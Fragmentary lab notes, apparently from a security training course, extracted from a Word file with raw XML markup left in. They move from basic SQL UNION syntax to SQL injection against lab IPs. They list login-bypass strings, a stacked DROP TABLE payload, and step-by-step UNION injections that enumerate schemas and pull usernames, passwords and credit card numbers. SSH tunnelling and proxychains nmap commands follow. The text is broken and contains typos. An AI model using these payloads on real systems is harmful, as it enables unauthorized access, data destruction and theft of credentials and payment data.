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* from Tires;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syntax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#Select list,of,columns from database.table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tireid,name,size,cost from session.Tires;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select * from session.car;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Combine two selects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from * from session.Tires union select * from session.car;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ERROR: different # of columns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session.Tires union select carid,name,type,cost from session.car;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CORRECT: select same number of columns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torrid,name,size,cost,0,0 from session.Tires union select * from session.car;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CORRECT: placeholder integer value for missing columns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describe Tires;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Injection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(for by-passing authentication in login screens)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TOM’ OR 1=’1 in the name and passfields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Truth statement: tom ‘ OR 1=’1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Server-side query executed would appear like this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id FROM users WHERE name=’tom’ OR 1=’1’ AND pass =’tom’ or 1=’1’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tom’ OR 1=’1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tom’ OR 1=’1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F12 -&gt; Network -&gt; Request &gt; RAW &gt; Insert the encoding into the raw followed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“?”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10.50.37.158/login.php?&lt;encoding&gt;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View Source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Stacking Statements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Johnny'; DROP TABLE Customers;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POST Method </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(type these steps into the input field)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1)cycle through all options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ford’ or 1=’1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dodge’ or 1=’1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honda’ or 1=’1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audi’ or 1=’1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2) find # of columns in the original select statement so that u can match with UNION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Audi’ union select 1,2,3,4,@@version;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Audi’ union select 1,2,3,4,5; #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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 is missing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@@version to get version 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3)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Audi’ union select id,2,3,4,5 from session.user;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Audi’ union select table_schema,2,table_name,column_name,5 from information_schema.columns; #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         &lt;database name&gt;.&lt;table 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table_schema = database names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table_name = table names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column_name = column names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this will give user generated databases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RIGHT CLICK + DUPLICATE THIS TAB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4) pull user table (id, name, pass)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Audi’ union select id,2,name,pass,5 from session.user;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(URL field)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Step 1) cycle through and get the vulnerability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10.50.37.158/uniondemo.php?...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?Selection=1 or 1=1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?Selection=2 or 1=1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?Selection=3 or 1=1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Step 2) find the number of columns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?Selection=2 union select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?Selection=2 union select 1,2,3 from information_schema.columns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 3)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?Selection=2 union select table_schema,column_name,table_name from information_schema.columns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Step 4)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?Selection=2 union select name,type,cost from session.car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lin-ops$ ssh student@10.50.35.200 -L 60601:localhost:22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student@localhost -p 60601 -D 9050 -NT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proxychains nmap 10.100.28.48 -Pn --script http-enum -p 80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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cuyi62c72gd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DNLA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http://10.100.28.48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http://10.100.28.48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?category=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 1=1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h8h6WYCVhtAEHNlcTIEN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qz9ez6nno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?category=1 or 1=1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?category=1 union select table_schema,column_name,table_name from information_schema.columns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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d7t6k98dmhu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SQL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?category=1 union select 0,0,@@version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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1a4smiyhrsx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Admin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?category=1 union select username,password,id from sqlinjection.members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eRDFIO64a5nJMmsSVjMV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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_16fzq5xn3b0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?category=1 union select creditcard_number,0,0 from sqlinjection.payments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cnFeILykIklBNDTR954L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8zcgj67o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Id search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?category=1 union select mime,0,id from sqlinjection.share4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y91cajphi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Create an Admin User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100.28.48" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.100.28.48/cases/productsCategory.php?category=1" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.100.28.48/cases/productsCategory.php?category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